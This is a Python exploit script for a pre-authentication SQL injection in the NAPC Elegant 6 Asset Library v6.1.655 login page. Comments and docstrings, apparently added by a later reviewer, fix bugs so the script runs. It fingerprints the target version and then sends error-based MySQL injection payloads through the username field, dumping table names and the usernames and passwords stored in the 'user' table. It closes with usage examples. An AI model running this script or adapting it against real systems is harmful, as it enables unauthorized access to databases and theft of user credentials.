#This will dump tables, usernames and passwords in vulnerable versions
#REQUIRE PARAMS: LoginForm[password]=&LoginForm[rememberMe]=0&LoginForm[username]=SQL&yt0
#SQL INJECTION VULN PARAM --> LoginForm[username]
#================================================
# Module-level state shared by the helpers below (set from the CLI in main()).
IP=""                  # target host (-i)
PORT="80"              # target port, kept as a string because URLs are built by concatenation (-p)
URL=""                 # never read: sql_inject_request() builds its own local URL
NUM_INJECTS=20         # upper bound on rows / attempts per run (-m)
k=1                    # LIMIT count used by inc(); inc() only bumps it when it is already != 1, so it stays 1
j=0                    # LIMIT offset cursor shared by inc() and breach()
TABLES=False           # -t: enumerate table names
CREDS=False            # -c: dump username/password rows from `user`
SHOW_SQL_ERROR=False   # -s: print the raw SQL error fragment instead of the extracted value
def vuln_ver_chk():
    """Fingerprint the login page and return True only for the exact build 6.1.655.

    Reads the module globals IP and PORT. The check is a strict match on the
    appVersion string embedded in the page, so other (possibly also affected)
    builds are reported as not vulnerable. Prints the verdict either way.
    """
    login_url = f"http://{IP}:{PORT}/elegant6/login"
    page = requests.get(login_url).content.decode()
    fingerprint = re.search(r'\bElegant",appVersion:"6.1.655\b', page)
    if fingerprint is None:
        print("[!] Version not vulnerable :(")
        return False
    print("[+] Found vulnerable NAPC Elegant 6 Asset Library version 6.1.655.")
    return True
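def sql_inject_request(SQL):
    """POST one login attempt with SQL in LoginForm[username]; return the echoed DB error.

    Reads the module globals IP and PORT. The application reflects the
    database exception text (the 'CDbCommand' marker suggests a Yii backend —
    presumed) into the response; this returns the slice from 'CDbCommand' up
    to 'key 1' plus three characters, as bytes, which tidy_up() then trims.

    Fix: the original located the markers in the decoded text but sliced the
    raw bytes, so character and byte offsets diverged as soon as the response
    held any multi-byte UTF-8. The slice is now taken from the decoded text
    and re-encoded, which is byte-identical for ASCII responses.
    """
    URL = "http://" + IP + ":" + PORT + "/elegant6/login"
    headers = {'User-Agent': 'Mozilla/5.0'}
    payload = {'LoginForm[password]': '1', 'LoginForm[rememberMe]': '0', 'LoginForm[username]': SQL}
    session = requests.Session()
    res = session.post(URL, headers=headers, data=payload)
    body = res.content.decode('utf-8')
    idx = body.find('CDbCommand')   # start of the SQL error in the response
    idx2 = body.find('key 1')       # end of the SQL error in the response
    # both markers are searched in the decoded text, so slice that text too
    return body[idx: idx2 + 3].encode('utf-8')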
#Advances the shared LIMIT cursor: yields "1,1", "2,1", "3,1", ... (k never leaves 1); returns None once j reaches NUM_INJECTS
def inc():
    """Advance the shared LIMIT cursor and return it as "offset,count".

    j is incremented on each call while it is below NUM_INJECTS; k starts at 1
    and is only incremented when it is already != 1, so it stays 1. Returns
    None once j has reached NUM_INJECTS. The first value returned is "1,1" —
    MySQL `LIMIT 1,1` skips the first row, so offset 0 is never queried
    (whether that is intended is not clear from the code).
    """
    global k, j
    if j >= NUM_INJECTS:
        return None
    j += 1
    if k != 1:
        k += 1
    return f"{j},{k}"
def tidy_up(results):
    """Extract the value MySQL echoes between quotes in a duplicate-entry error.

    results is the bytes fragment returned by sql_inject_request(). Returns
    None when it contains no single quote. With the CREDS global set the
    slice starts two bytes after the first quote (skipping the 0x2b '+' that
    breach() concat()s in front of the value — presumed) and runs to the last
    quote; otherwise it starts one byte after the first quote and stops two
    bytes before the last one.
    """
    quote = b"'"
    start = results.find(quote)
    if start == -1:
        return None
    end = results.rfind(quote)
    if CREDS:
        return results[start + 2:end]
    return results[start + 1:end - 2]
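def breach(i):
    """Run injection round i: fetch one credential field and/or walk table names.

    Both payloads use MySQL's duplicate-entry (floor(rand(0)*2) GROUP BY) trick,
    so the extracted value comes back inside the SQL error that the login page
    echoes. With SHOW_SQL_ERROR the raw error fragment is printed, otherwise
    tidy_up() trims it to the value. Reads the globals CREDS, TABLES,
    SHOW_SQL_ERROR, NUM_INJECTS and j; the table walk consumes the shared
    cursor via inc(), so it runs to completion on the first call and is a
    no-op afterwards.

    Fix: sql_inject_request() returns bytes, so the newline appended in the
    SHOW_SQL_ERROR branches must be bytes as well — the original added a str
    and raised TypeError whenever -s was used.
    """
    global k, j, NUM_INJECTS, SHOW_SQL_ERROR
    result = ""
    # Dump usernames & passwords
    if CREDS:
        # NOTE(review): even i reads the username of row i, odd i the password
        # of row i, so row 0's password and row 1's username are never fetched;
        # `limit i//2, 1` would pair them up. Left as-is pending the author's intent.
        target = 'username' if i % 2 == 0 else 'password'
        SQL = ('"and (select 1 from(select count(*),concat((select(select concat(0x2b,' + target + '))'
               'from user limit ' + str(i) + ', 1),floor(rand(0)*2))x from user group by x)a)-- -')
        if not SHOW_SQL_ERROR:
            result = tidy_up(sql_inject_request(SQL))
        else:
            result = sql_inject_request(SQL) + b"\n"
        if result:
            result = result.decode()
        print("[+] Dumping " + str(target) + ": " + str(result))
    # Dump tables
    if TABLES:
        while j < NUM_INJECTS:
            nums = inc()
            SQL = ('"and (select 1 from (Select count(*),Concat((select table_name from information_schema.tables where table_schema=database()'
                   'limit ' + nums + '),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x)-- -')
            if not SHOW_SQL_ERROR:
                result = tidy_up(sql_inject_request(SQL))
            else:
                result = sql_inject_request(SQL) + b"\n"
            if result:
                print("[+] Dumping Table... " + str(result.decode()))
            time.sleep(0.3)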
def parse_args():
    """Build the CLI and parse sys.argv.

    Nothing is required here; main() applies the values to the module globals
    and supplies the defaults. The toggle options take an optional value and
    yield "1" when given bare, None when absent.
    """
    cli = argparse.ArgumentParser()
    toggle = dict(nargs="?", const="1")
    cli.add_argument("-i", "--ip_address", help="<TARGET-IP>.")
    cli.add_argument("-p", "--port", help="Port, Default is 80")
    cli.add_argument("-t", "--get_tables", help="Dump Database Tables.", **toggle)
    cli.add_argument("-c", "--creds", help="Dump Database Credentials.", **toggle)
    cli.add_argument("-m", "--max_injects", help="Max SQL Injection Attempts, Default is 20.", **toggle)
    cli.add_argument("-s", "--show_sql_errors", help="Display SQL Errors, Default is Clean Dumps.", **toggle)
    cli.add_argument("-e", "--examples", help="Show script usage.", **toggle)
    return cli.parse_args()
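def usage():
    """Print example invocations and exit with status 0.

    Fix: uses sys.exit instead of the `exit` name injected by the site module,
    which is absent under `python -S` and in frozen interpreters.
    """
    examples = (
        "Dump first ten rows of usernames and passwords",
        "NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -c -m 10\n",
        "\nDump first five rows of database tables and show SQL errors",
        "NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -t -m 5 -s\n",
        "NAPC-Elegant-6-SQL-Exploit.py -i <TARGET-IP> -p80 -t -c -m30\n",
    )
    for line in examples:
        print(line)
    sys.exit(0)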
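def main(args):
    """Apply CLI options to the module globals and run the injection loop.

    Calls usage() (which exits) when -e is given, then only proceeds when
    vuln_ver_chk() matches the exact target build.

    Fix: PORT was missing from the `global` statement, so `-p` assigned a
    function local and every request kept using the default "80".
    """
    global TABLES, CREDS, URL, IP, PORT, NUM_INJECTS, SHOW_SQL_ERROR
    if args.ip_address:
        IP = args.ip_address
    if args.port:
        PORT = args.port
    if args.get_tables:
        TABLES = True
    if args.creds:
        CREDS = True
    if args.max_injects:
        NUM_INJECTS = int(args.max_injects)
    if args.show_sql_errors:
        SHOW_SQL_ERROR = True
    if args.examples:
        usage()
    if vuln_ver_chk():
        for i in range(0, NUM_INJECTS):
            breach(i)
            time.sleep(0.3)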
if __name__ == '__main__':
    # NOTE(review): this parser has no arguments registered (parse_args()
    # builds its own), so the help printed below only lists -h.
    parser = argparse.ArgumentParser()
    banner = (
        "NAPC Elegant 6 Asset Library v6.1.655\n"
        "Pre-Authorization SQL Injection 0day Exploit\n"
        "Discovery / eXploit By hyp3rlinx\n"
        "ApparitionSec\n"
    )
    print(banner)
    time.sleep(0.5)
    # no arguments at all: show the (bare) help and leave
    if len(sys.argv) == 1:
        parser.print_help(sys.stderr)
        sys.exit(0)
    main(parse_args())